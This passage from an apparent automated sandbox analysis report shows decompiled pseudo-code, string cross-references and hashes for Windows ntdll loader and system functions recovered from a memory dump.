				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0509934A() != 0) {
								_t159 = E0510A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x5175780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05105510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x5175780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0509849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E05098999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E05098999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x5175c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x5175c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E050A2280(_t92, 0x51786cc);
															_t94 = E05159DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E050B61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x5175c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E05098A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x5175c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x5175c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E050CF380(_t136, 0x5061184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E050A2280(_t108, 0x51786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E050B61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05159D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0509FFB0(_t118, _t156, 0x51786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E050C9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x05098799
0x0509879d
0x050987a1
0x050987a3
0x050987a8
0x050987c3
0x050987c3
0x050987c8
0x050987d1
0x050987d4
0x050987d8
0x050987e5
0x050987ec
0x050e9bfe
0x050e9c00
0x050e9c02
0x050e9c08
0x050e9c0d
0x050e9c0f
0x050e9c14
0x050e9c2d
0x050e9c32
0x050e9c37
0x050e9c3a
0x050e9c3c
0x050e9c42
0x050e9c42
0x050e9c3c
0x050e9c02
0x050987da
0x050987df
0x050987e3
0x00000000
0x00000000
0x050987e3
0x050987f2
0x00000000
0x050987fb
0x050987fd
0x050987fe
0x0509880e
0x0509880f
0x05098810
0x05098814
0x0509881a
0x0509881c
0x0509881f
0x05098821
0x05098822
0x05098824
0x05098826
0x0509882c
0x0509882e
0x050e9c48
0x050e9c48
0x05098834
0x05098834
0x05098837
0x00000000
0x00000000
0x05098837
0x0509882e
0x0509883d
0x05098840
0x05098843
0x05098846
0x05098849
0x0509884c
0x0509884e
0x05098850
0x05098852
0x05098854
0x05098857
0x050988b4
0x050988b6
0x050988b6
0x05098859
0x05098859
0x05098859
0x05098861
0x05098866
0x0509886a
0x0509893d
0x05098941
0x00000000
0x05098947
0x05098947
0x0509894a
0x0509894c
0x00000000
0x05098952
0x05098955
0x0509895a
0x0509895d
0x0509895d
0x0509895f
0x05098961
0x05098961
0x05098968
0x00000000
0x00000000
0x0509896a
0x0509896b
0x0509896e
0x00000000
0x05098970
0x05098970
0x05098970
0x05098970
0x05098972
0x05098972
0x05098974
0x00000000
0x0509897a
0x0509897a
0x0509897d
0x00000000
0x05098983
0x050e9c65
0x050e9c6d
0x050e9c72
0x050e9c75
0x050e9c75
0x050e9c82
0x050e9c86
0x050e9c87
0x050e9c88
0x050e9c89
0x050e9c8c
0x050e9c90
0x050e9c95
0x050e9c97
0x050e9ca0
0x050e9ca3
0x050e9ca9
0x050e9ca9
0x00000000
0x050e9ca9
0x050e9ca3
0x00000000
0x050e9c97
0x0509897d
0x00000000
0x05098974
0x05098988
0x05098992
0x05098996
0x00000000
0x05098996
0x0509894c
0x00000000
0x05098870
0x0509887b
0x0509887d
0x0509887f
0x05098881
0x05098884
0x05098884
0x05098886
0x05098889
0x0509888c
0x0509888e
0x05098891
0x05098891
0x05098898
0x00000000
0x00000000
0x0509889a
0x0509889b
0x0509889e
0x00000000
0x00000000
0x050988a0
0x050988a8
0x050988b0
0x050988b2
0x050988d3
0x050988d5
0x00000000
0x050988d7
0x050988db
0x050988dc
0x050988e0
0x050988e8
0x050988ee
0x050988f0
0x050988f3
0x050988fc
0x05098901
0x05098906
0x0509890c
0x0509890c
0x0509890f
0x05098916
0x05098917
0x05098918
0x05098919
0x0509891a
0x0509891f
0x05098921
0x050e9c52
0x050e9c55
0x050e9c5b
0x050e9cac
0x050e9cc0
0x050e9cc0
0x050e9c55
0x05098927
0x05098927
0x0509892f
0x05098933
0x00000000
0x050988f5
0x050988f5
0x00000000
0x050988f7
0x050988f7
0x050988fa
0x00000000
0x00000000
0x00000000
0x00000000
0x050988fa
0x050988f5
0x050988f3
0x00000000
0x050988d5
0x00000000
0x050988b2
0x050988c9
0x00000000
0x050988c9
0x0509887f
0x0509886a
0x05098857
0x05098852
0x050988bf
0x050988bf
0x050987aa
0x050987ad
0x050987ae
0x050987b4
0x050987b5
0x050987b6
0x050987b8
0x050987bd
0x050987c1
0x050987f4
0x050987fa
0x00000000
0x00000000
0x00000000
0x050987c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 050E9C18
minkernel\ntdll\ldrsnap.c, xrefs: 050E9C28
LdrpDoPostSnapWork, xrefs: 050E9C1E

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 51f72870d0987c477357a6334f1edf58933423697829a99f474f7012b8a046e9
Instruction ID: 30608fdab7ace744f65ebee166dae59fb5c26f9902ca084d03c44611e2119e7c
Opcode Fuzzy Hash: 51f72870d0987c477357a6334f1edf58933423697829a99f474f7012b8a046e9
Instruction Fuzzy Hash: 1691C271A0020AAFDF5CDF58E4819BEB7F6FF46310F558069E906AB244D730E941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05097E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E05097E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0509CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0508C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x5175780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05105510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x5175780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E050A7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E050A7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05107016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E050A7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E050A7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05107016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E050BA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0508B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x05097e4c
0x05097e50
0x05097e55
0x05097e58
0x05097e5d
0x05097e71
0x05097f33
0x05097e77
0x05097e77
0x05097e79
0x05097e79
0x05097e7e
0x05097f45
0x050e9848
0x00000000
0x050e9848
0x05097f4e
0x05097f53
0x05097f5a
0x00000000
0x00000000
0x050e985a
0x050e9862
0x050e9866
0x00000000
0x050e986c
0x00000000
0x050e986c
0x05097e84
0x05097e84
0x05097e8d
0x050e9871
0x05097eb8
0x05097ec0
0x05097ec0
0x05097e9a
0x050e987e
0x00000000
0x00000000
0x050e9884
0x050e988b
0x050e98a7
0x050e98ac
0x050e98b1
0x050e98b6
0x050e98b8
0x050e98b8
0x050e98b9
0x00000000
0x050e98b9
0x05097ea0
0x05097ea7
0x00000000
0x00000000
0x05097eac
0x05097eb1
0x05097ec6
0x05097ed0
0x050e98cc
0x05097ed6
0x05097ed6
0x05097ed6
0x05097ede
0x05097ee3
0x050e98e3
0x050e98f0
0x050e9902
0x050e98f2
0x050e98fb
0x050e98fb
0x050e9907
0x050e991d
0x050e991d
0x050e9907
0x050e98e3
0x05097ef0
0x05097f14
0x05097f14
0x05097f1e
0x050e9946
0x05097f24
0x05097f24
0x05097f24
0x05097f2c
0x050e996a
0x050e9975
0x050e9975
0x050e997e
0x050e9993
0x050e9993
0x050e997e
0x00000000
0x05097ef2
0x05097efc
0x05097f0a
0x05097f0e
0x050e9933
0x00000000
0x050e9933
0x00000000
0x05097f0e
0x00000000
0x00000000
0x00000000
0x05097eb1

Strings

LdrpCompleteMapModule, xrefs: 050E9898
minkernel\ntdll\ldrmap.c, xrefs: 050E98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 050E9891

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: e8cf4921be4a2a87269d3bd6fa649e0e53c36679dbcb6145c74add071723b69d
Instruction ID: 6a8b35f5bd49622a8bbf1f357baf88ade452e6b482f05ee2bbf98b0d821d0046
Opcode Fuzzy Hash: e8cf4921be4a2a87269d3bd6fa649e0e53c36679dbcb6145c74add071723b69d
Instruction Fuzzy Hash: 86511F326147449FEB29CF68E948B6E7BE5FB0A310F140A99E8529B3E5D730ED00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0508E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0508E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0508F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E050C95D0();
						}
						if(_t78 != 0) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E050CFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E050CBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E050C9600();
					if(_t97 < 0) {
						goto L6;
					}
					E050CBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0508F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E050CBB40(_t83, _t102 + 0x24, _t78);
								if(L050943C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E050CBB40(_t84, _t102 + 0x24, _t94);
									if(L050943C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0508e620
0x0508e628
0x0508e62f
0x0508e631
0x0508e635
0x0508e637
0x0508e63e
0x050e5503
0x050e5503
0x0508e64c
0x0508e64c
0x0508e651
0x00000000
0x00000000
0x0508e661
0x0508e665
0x050e542a
0x0508e715
0x0508e71a
0x0508e71c
0x0508e720
0x0508e720
0x0508e727
0x0508e736
0x0508e736
0x0508e743
0x0508e743
0x0508e673
0x0508e678
0x0508e67d
0x0508e682
0x0508e685
0x0508e692
0x0508e69b
0x0508e6a3
0x0508e6ad
0x0508e6b1
0x0508e6b2
0x0508e6bb
0x0508e6bf
0x0508e6c0
0x0508e6c8
0x0508e6cc
0x0508e6d5
0x0508e6d9
0x00000000
0x00000000
0x0508e6e5
0x0508e6ea
0x0508e6f9
0x0508e70b
0x0508e70f
0x050e5439
0x050e545e
0x050e545e
0x00000000
0x050e545e
0x050e543b
0x050e543e
0x050e5440
0x050e5445
0x050e5472
0x050e5475
0x050e548d
0x050e5493
0x050e54a9
0x00000000
0x00000000
0x050e54ab
0x050e54b4
0x050e54bc
0x050e54c8
0x050e54de
0x050e54fb
0x050e54e0
0x050e54e6
0x050e54eb
0x050e54eb
0x050e54de
0x00000000
0x050e54bc
0x050e5477
0x050e547a
0x050e5480
0x050e5483
0x050e5486
0x050e548b
0x00000000
0x00000000
0x00000000
0x050e548b
0x00000000
0x00000000
0x00000000
0x00000000
0x050e5447
0x050e5447
0x050e5447
0x050e5447
0x050e544e
0x00000000
0x00000000
0x050e5450
0x050e5452
0x050e5455
0x050e545a
0x00000000
0x00000000
0x00000000
0x050e545c
0x050e546a
0x050e546d
0x050e546f
0x00000000
0x050e546f
0x0508e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0508E68C
InstallLanguageFallback, xrefs: 0508E6DB
@, xrefs: 0508E6C0

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: ad751cd7bedc931070410dfba74d2a8b28d41854b87c4cc2ebec9b3f5b766e48
Instruction ID: dd1dabc6e61151ebfe8272c29075d813fcd596b43bb03a2c0365dda94e045e41
Opcode Fuzzy Hash: ad751cd7bedc931070410dfba74d2a8b28d41854b87c4cc2ebec9b3f5b766e48
Instruction Fuzzy Hash: C6519EB26083459BC714EF64E884ABFB3E9BF88618F55096EF985D7240E734D90487A2

Uniqueness

Uniqueness Score: -1.00%

Function 051051BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E051051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x51605f0);
				E050DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0509EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E051053CA(0);
						return E050DD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E050CF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E050A3690(1, _t117, 0x5061810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E050CAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L050A4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E050CAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0510500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E050C9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x051051be
0x051051c3
0x051051c8
0x051051cd
0x051051d0
0x051051d3
0x051051d8
0x051051db
0x051051de
0x051051e0
0x051051e3
0x051051e6
0x051051e8
0x05105342
